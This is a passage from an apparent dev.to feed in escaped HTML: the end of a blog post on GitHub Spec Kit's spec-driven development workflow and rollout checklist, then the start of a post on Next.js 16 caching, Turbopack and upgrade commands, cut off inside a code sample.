&lt;td&gt;&lt;code&gt;/speckit.constitution&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-constitution&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Create/update governing principles and dev guidelines&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.specify&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-specify&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Define the what &amp;amp; why — requirements and user stories (PRD)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.plan&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-plan&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The how — implementation plan with your chosen stack/architecture&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.tasks&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-tasks&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Break the plan into an actionable task list&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.taskstoissues&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-taskstoissues&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Convert tasks into GitHub issues for tracking/execution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.implement&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-implement&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Execute all tasks to build the feature per the plan&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;code&gt;/speckit.specify&lt;/code&gt; &lt;strong&gt;explicitly excludes technical decisions&lt;/strong&gt; — you write motivations and functional requirements, not the stack. Conversely &lt;code&gt;/speckit.plan&lt;/code&gt; handles the "how" (frameworks, libraries, DB, infra) and produces extra metadata like research, data contracts, and a quickstart so teammates can start experimenting immediately.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Step 4: what / why (do NOT specify the stack)&lt;/span&gt;
/speckit.specify Build an app that organizes photos into albums grouped by &lt;span class="nb"&gt;date&lt;/span&gt;,
re-orderable by drag-and-drop on the main page, no nested albums, tile-style previews per album.

&lt;span class="c"&gt;# Step 5: how (stack / architecture)&lt;/span&gt;
/speckit.plan Use Vite with minimal libraries. Prefer vanilla HTML/CSS/JS.
Images are not uploaded anywhere&lt;span class="p"&gt;;&lt;/span&gt; metadata stored &lt;span class="k"&gt;in &lt;/span&gt;&lt;span class="nb"&gt;local &lt;/span&gt;SQLite.

&lt;span class="c"&gt;# Step 6: break into tasks&lt;/span&gt;
/speckit.tasks

&lt;span class="c"&gt;# Step 7: execute implementation&lt;/span&gt;
/speckit.implement
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 Optional commands — the quality gates
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;th&gt;Agent skill&lt;/th&gt;
&lt;th&gt;Role / recommended timing&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.clarify&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-clarify&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Resolve underspecified areas via questions — before &lt;code&gt;plan&lt;/code&gt; (formerly &lt;code&gt;/quizme&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.analyze&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-analyze&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cross-artifact consistency &amp;amp; coverage — after &lt;code&gt;tasks&lt;/code&gt;, before &lt;code&gt;implement&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;/speckit.checklist&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;speckit-checklist&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Generate requirement completeness/clarity checklists ("unit tests for English")&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;In practice the most recommended end-to-end flow is &lt;strong&gt;constitution → specify → clarify → plan → tasks → analyze → implement&lt;/strong&gt;. Filling spec gaps with &lt;code&gt;clarify&lt;/code&gt; and verifying that spec/plan/tasks don't contradict each other with &lt;code&gt;analyze&lt;/code&gt; &lt;em&gt;before&lt;/em&gt; implementing is what cuts rework the most.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;flowchart TD
  A["/speckit.constitution\nproject constitution = non-negotiables"] --&amp;gt; B["/speckit.specify\nwhat / why (PRD)"]
  B --&amp;gt; C["/speckit.clarify\nresolve ambiguity"]
  C --&amp;gt; D["/speckit.plan\nhow (stack / architecture)"]
  D --&amp;gt; E["/speckit.tasks\nactionable task breakdown"]
  E --&amp;gt; F["/speckit.analyze\nartifact consistency / coverage"]
  F --&amp;gt; G{"consistent?"}
  G --&amp;gt;|no| B
  G --&amp;gt;|yes| H["/speckit.implement\nexecute tasks -&amp;gt; code"]
  H --&amp;gt; I["verify: tests + manual review\ncompare spec vs implementation"]
  I --&amp;gt; J{"spec satisfied?"}
  J --&amp;gt;|no| C
  J --&amp;gt;|yes| K["merge / next feature branch"]
  A -. grounding .-&amp;gt; D
  A -. grounding .-&amp;gt; H
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  5. Extensions and presets — organizational customization
&lt;/h2&gt;

&lt;p&gt;Spec Kit can be tailored via two complementary systems — &lt;strong&gt;Extensions&lt;/strong&gt; and &lt;strong&gt;Presets&lt;/strong&gt; — plus project-local overrides. Templates are resolved at &lt;strong&gt;runtime&lt;/strong&gt;: Spec Kit walks the priority stack top-down and uses the first match.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Priority&lt;/th&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Location&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1 (highest)&lt;/td&gt;
&lt;td&gt;Project-local overrides&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.specify/templates/overrides/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Presets — customize core &amp;amp; extensions&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.specify/presets/templates/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Extensions — add new capabilities&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.specify/extensions/templates/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4 (lowest)&lt;/td&gt;
&lt;td&gt;Spec Kit Core — built-in SDD commands &amp;amp; templates&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.specify/templates/&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For integrations that support skills mode, &lt;code&gt;--integration &amp;lt;agent&amp;gt; --integration-options="--skills"&lt;/code&gt; installs agent skills instead of slash-command prompt files — so you can ship the same SDD workflow as either slash commands or skills.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. Limits and operational caveats — "the spec is perfect, the code is empty"
&lt;/h2&gt;

&lt;p&gt;SDD is not a silver bullet. The most-raised issues in the official blog's comments map directly onto real operational risks.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;False done&lt;/strong&gt;: the spec/plan/tasks docs read beautifully, the agent reports "implementation complete," yet much of the functionality is missing and there are zero tests. → Don't treat &lt;code&gt;/speckit.implement&lt;/code&gt; as a trusted finish line. Pin "every feature ships with tests" into the constitution and &lt;strong&gt;compare implementation against the spec&lt;/strong&gt; via &lt;code&gt;checklist&lt;/code&gt; and real test runs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What goes in the spec&lt;/strong&gt;: a fundamental question — "user stories, or some other form?" A more detailed first prompt dramatically improves spec quality, so be concrete about the experiences critical to success and what you explicitly &lt;em&gt;don't&lt;/em&gt; want.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Multi-agent, multi-developer&lt;/strong&gt;: in one monorepo with devs using Cursor, Claude Code, and Gemini CLI, how do you keep a single spec? → Keep the spec outside the IDE, versioned alongside the repo. Then swapping tools still means implementing against the same contract, and the speedup comes from alignment.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In short, SDD's speed comes not from "faster typing" but from &lt;strong&gt;alignment&lt;/strong&gt; — and alignment holds only when a human reviews and approves the constitution and spec to the end.&lt;/p&gt;

&lt;h2&gt;
  
  
  7. ManoIT internal rollout checklist
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Prep prerequisites — uv, Python 3.11+, Git; pick a standard agent&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;specify integration list&lt;/code&gt; works&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Apply &lt;code&gt;specify init --integration &amp;lt;agent&amp;gt;&lt;/code&gt; to a PoC repo&lt;/td&gt;
&lt;td&gt;Lead eng&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;.specify/&lt;/code&gt; + agent folder created&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Author a company-standard &lt;code&gt;constitution.md&lt;/code&gt; (tests, security, CLI-first)&lt;/td&gt;
&lt;td&gt;Architect&lt;/td&gt;
&lt;td&gt;Shared constitution PR merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Run specify→clarify→plan once on a representative feature&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;spec/plan/data contract produced&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Mandate the &lt;code&gt;analyze&lt;/code&gt; consistency gate after &lt;code&gt;tasks&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;implement only at zero warnings&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Standardize &lt;code&gt;checklist&lt;/code&gt; + real tests to prevent "false done"&lt;/td&gt;
&lt;td&gt;QA&lt;/td&gt;
&lt;td&gt;impl-vs-spec comparison report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Version specs under &lt;code&gt;specs/&lt;/code&gt; per feature branch&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;same spec reused after tool swap&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Standardize internal templates via Extensions/Presets&lt;/td&gt;
&lt;td&gt;DX&lt;/td&gt;
&lt;td&gt;auto-applied on new-repo scaffolding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Wire &lt;code&gt;taskstoissues&lt;/code&gt; to link tasks ↔ GitHub issues&lt;/td&gt;
&lt;td&gt;Each team&lt;/td&gt;
&lt;td&gt;auto-loaded onto sprint board&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  8. Conclusion — "intent before code, constitution above the agent"
&lt;/h2&gt;

&lt;p&gt;In one line, GitHub Spec Kit is &lt;strong&gt;a toolkit that pins intent, plan, and principles into an executable spec &lt;em&gt;before&lt;/em&gt; code, in order to control what AI agents output.&lt;/strong&gt; The &lt;code&gt;Constitution&lt;/code&gt; turns an organization's non-negotiables into a guardrail across every step, and the staged &lt;code&gt;/speckit.specify → clarify → plan → tasks → analyze → implement&lt;/code&gt; flow separates "what/why" from "how" so each decision is reviewable. The Specify CLI bootstraps all of this across 30+ agents with near-zero config — but remember the tool itself is "not magic, just templates + scripts."&lt;/p&gt;

&lt;p&gt;Three operational recommendations to close: (1) &lt;strong&gt;Start with the constitution&lt;/strong&gt; — if you don't pin testing, security, and architecture conventions into &lt;code&gt;constitution.md&lt;/code&gt; first, you'll be left with empty implementations behind well-written specs. (2) &lt;strong&gt;Don't skip clarify and analyze&lt;/strong&gt; — resolving ambiguity and checking artifact consistency cut implementation rework the most. (3) &lt;strong&gt;Version specs like code&lt;/strong&gt; — the spec must live outside the IDE in the repo so you can collaborate against the same contract even when tools change. The shortest possible advice: &lt;em&gt;run &lt;code&gt;specify init&lt;/code&gt; on one PoC repo this sprint, write your internal constitution, and complete one full pass on a representative feature.&lt;/em&gt;&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;This article was researched and written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), using the GitHub Spec Kit official docs (github.github.com/spec-kit, updated 2026-05-27), the github/spec-kit repository README (slash commands and CLI reference), the Microsoft developer blog (Den Delimarsky, 2025-09-15) and its community discussion, and SDD adoption reporting as primary sources. Command names, CLI options, directory structure, and statistics reflect official docs as of 2026-05-31; Spec Kit is explicitly an experimental project and may change. Verify the latest commands and integration status at github.com/github/spec-kit Releases before adopting in production.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1481775" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>softwareengineering</category>
      <category>ai</category>
      <category>programming</category>
      <category>github</category>
    </item>
    <item>
      <title>Next.js 16 Deep Dive — Cache Components with use cache, Turbopack as the Default Bundler, middleware to proxy.ts, and 16.2's AI-Native DevTools</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Fri, 29 May 2026 23:52:25 +0000</pubDate>
      <link>https://dev.to/x4nent/nextjs-16-deep-dive-cache-components-with-use-cache-turbopack-as-the-default-bundler-6h0</link>
      <guid>https://dev.to/x4nent/nextjs-16-deep-dive-cache-components-with-use-cache-turbopack-as-the-default-bundler-6h0</guid>
      <description>&lt;h1&gt;
  
  
  Next.js 16 Deep Dive — Cache Components with use cache, Turbopack as the Default Bundler, middleware → proxy.ts, and 16.2's AI-Native DevTools Redefining the 2026 React Full-Stack Standard
&lt;/h1&gt;

&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Next.js 16 went GA on &lt;strong&gt;October 21, 2025&lt;/strong&gt;, then evolved through &lt;strong&gt;16.1&lt;/strong&gt; and the March 18, 2026 &lt;strong&gt;16.2&lt;/strong&gt; into the 16.2.x patch line shipping as of May 2026.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cache Components&lt;/strong&gt; and the &lt;strong&gt;&lt;code&gt;"use cache"&lt;/code&gt;&lt;/strong&gt; directive flip the App Router from implicit caching to an &lt;strong&gt;explicit, opt-in&lt;/strong&gt; model — dynamic by default, cached only where you say so, with compiler-generated cache keys.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Turbopack is now the stable default bundler&lt;/strong&gt;: 2–5× faster production builds and up to 10× faster Fast Refresh, no config required.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;middleware.ts&lt;/code&gt; becomes &lt;code&gt;proxy.ts&lt;/code&gt;&lt;/strong&gt; to make the request-time network boundary explicit (Node.js runtime).&lt;/li&gt;
&lt;li&gt;New caching APIs &lt;strong&gt;&lt;code&gt;revalidateTag&lt;/code&gt; / &lt;code&gt;updateTag&lt;/code&gt; / &lt;code&gt;refresh&lt;/code&gt;&lt;/strong&gt; separate SWR, read-your-writes, and uncached-refresh intents; &lt;strong&gt;React 19.2&lt;/strong&gt; (View Transitions, Activity, useEffectEvent) and &lt;strong&gt;React Compiler 1.0&lt;/strong&gt; support are stable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;16.2&lt;/strong&gt; turns the framework AI-native: &lt;code&gt;AGENTS.md&lt;/code&gt; by default, browser log forwarding, and an experimental &lt;strong&gt;Agent DevTools&lt;/strong&gt; CLI.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;Vercel shipped &lt;strong&gt;Next.js 16&lt;/strong&gt; as GA on October 21, 2025, then followed with &lt;strong&gt;16.1&lt;/strong&gt; and, on March 18, 2026, &lt;strong&gt;16.2&lt;/strong&gt; — landing on the 16.2.x patch line by May 2026. It's the endpoint of the arc that ran through 13 (App Router), 14 (Server Actions), and 15 (async APIs, Turbopack beta). In one paragraph: (1) &lt;strong&gt;Cache Components&lt;/strong&gt; and the &lt;code&gt;"use cache"&lt;/code&gt; directive end the &lt;em&gt;implicit caching&lt;/em&gt; that frustrated developers most, replacing it with an explicit opt-in model; (2) &lt;strong&gt;Turbopack is stabilized as the default bundler&lt;/strong&gt;, delivering 2–5× builds and up to 10× Fast Refresh as a zero-config default; and (3) &lt;code&gt;middleware.ts&lt;/code&gt; is renamed &lt;strong&gt;&lt;code&gt;proxy.ts&lt;/code&gt;&lt;/strong&gt; to clarify its identity as a request-time proxy in front of the cache. Add (4) the &lt;code&gt;revalidateTag&lt;/code&gt;/&lt;code&gt;updateTag&lt;/code&gt;/&lt;code&gt;refresh&lt;/code&gt; caching APIs, (5) &lt;strong&gt;React 19.2&lt;/strong&gt; and &lt;strong&gt;React Compiler&lt;/strong&gt; stabilization, (6) a &lt;strong&gt;layout-deduplication / incremental-prefetch&lt;/strong&gt; routing overhaul, and (7) 16.2's &lt;strong&gt;AGENTS.md, browser log forwarding, and Agent DevTools&lt;/strong&gt;. This article decomposes the root cause of each change from an operations/DX standpoint and lays out the step-by-step migration, validation, and rollback playbook ManoIT applied to its internal Next.js services.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why May 2026's Next.js 16 matters
&lt;/h2&gt;

&lt;p&gt;Through Next.js 15, the biggest friction in the App Router was "you can't predict what gets cached." Default &lt;code&gt;fetch&lt;/code&gt; caching, the Full Route Cache, and the Router Cache were implicitly entangled, making unintended static optimization and stale data frequent debugging points. Next.js 16 inverts the philosophy head-on — &lt;strong&gt;dynamic by default, caching is explicit opt-in&lt;/strong&gt; — while promoting the beta Turbopack to the default bundler so the framework delivers the fast startup and builds a full-stack framework is expected to provide, with no configuration.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Released&lt;/th&gt;
&lt;th&gt;Key change&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 13&lt;/td&gt;
&lt;td&gt;2022.10&lt;/td&gt;
&lt;td&gt;App Router &amp;amp; Server Components&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 14&lt;/td&gt;
&lt;td&gt;2023.10&lt;/td&gt;
&lt;td&gt;Server Actions stable, PPR preview&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 15&lt;/td&gt;
&lt;td&gt;2024.10&lt;/td&gt;
&lt;td&gt;async params/cookies/headers, Turbopack beta, React 19&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 16&lt;/td&gt;
&lt;td&gt;2025.10.21&lt;/td&gt;
&lt;td&gt;Cache Components (use cache), Turbopack stable, proxy.ts, React 19.2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 16.1&lt;/td&gt;
&lt;td&gt;2025.12&lt;/td&gt;
&lt;td&gt;Cache Components refinement, DX, caching-API hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js 16.2&lt;/td&gt;
&lt;td&gt;2026.03.18&lt;/td&gt;
&lt;td&gt;AGENTS.md by default, browser log forwarding, Agent DevTools, ~87% faster dev startup&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Upgrades start with a single codemod:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Automated upgrade codemod (recommended)&lt;/span&gt;
npx @next/codemod@canary upgrade latest

&lt;span class="c"&gt;# ...or upgrade manually&lt;/span&gt;
npm &lt;span class="nb"&gt;install &lt;/span&gt;next@latest react@latest react-dom@latest

&lt;span class="c"&gt;# ...or start fresh&lt;/span&gt;
npx create-next-app@latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  2. Cache Components — ending implicit caching with use cache
&lt;/h2&gt;

&lt;p&gt;This is 16's biggest paradigm shift. The previous App Router inferred "should this page be static or dynamic"; in 16, &lt;strong&gt;all dynamic code executes at request time by default&lt;/strong&gt;, and you attach &lt;code&gt;"use cache"&lt;/code&gt; only to the pages, components, or functions you want cached. The compiler auto-generates a cache key wherever &lt;code&gt;"use cache"&lt;/code&gt; appears, reducing manual-key mistakes.&lt;/p&gt;

&lt;p&gt;Enabling it is one line in &lt;code&gt;next.config.ts&lt;/code&gt;. The old &lt;code&gt;experimental.dynamicIO&lt;/code&gt; is renamed &lt;code&gt;cacheComponents&lt;/code&gt;, and the &lt;code&gt;experimental.ppr&lt;/code&gt; flag is removed and absorbed into this model.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// next.config.ts&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;cacheComponents&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In practice you declare the directive at the top of a function, component, or file. Combined with PPR (Partial Prerendering), it streams a static shell immediately while flowing dynamic parts through Suspense boundaries.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// app/products/page.tsx&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;Suspense&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;react&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// Statically cached header — rendered once&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;ProductHeader&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;use cache&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;meta&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;getCatalogMeta&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;h2&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nx"&gt;meta&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;title&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sr"&gt;/h2&amp;gt;&lt;/span&gt;&lt;span class="err"&gt;;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Dynamic — runs on every request&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;LivePrice&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="nx"&gt;id&lt;/span&gt; &lt;span class="p"&gt;}:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nl"&gt;id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;price&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;getRealtimePrice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;span&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nx"&gt;price&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sr"&gt;/span&amp;gt;&lt;/span&gt;&lt;span class="err"&gt;;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;Page&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;return &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="o"&gt;&amp;lt;&amp;gt;&lt;/span&gt;
      &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ProductHeader&lt;/span&gt; &lt;span class="o"&gt;/&amp;gt;&lt;/span&gt;
      &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;Suspense&lt;/span&gt; &lt;span class="nx"&gt;fallback&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;PriceSkeleton&lt;/span&gt; &lt;span class="o"&gt;/&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;
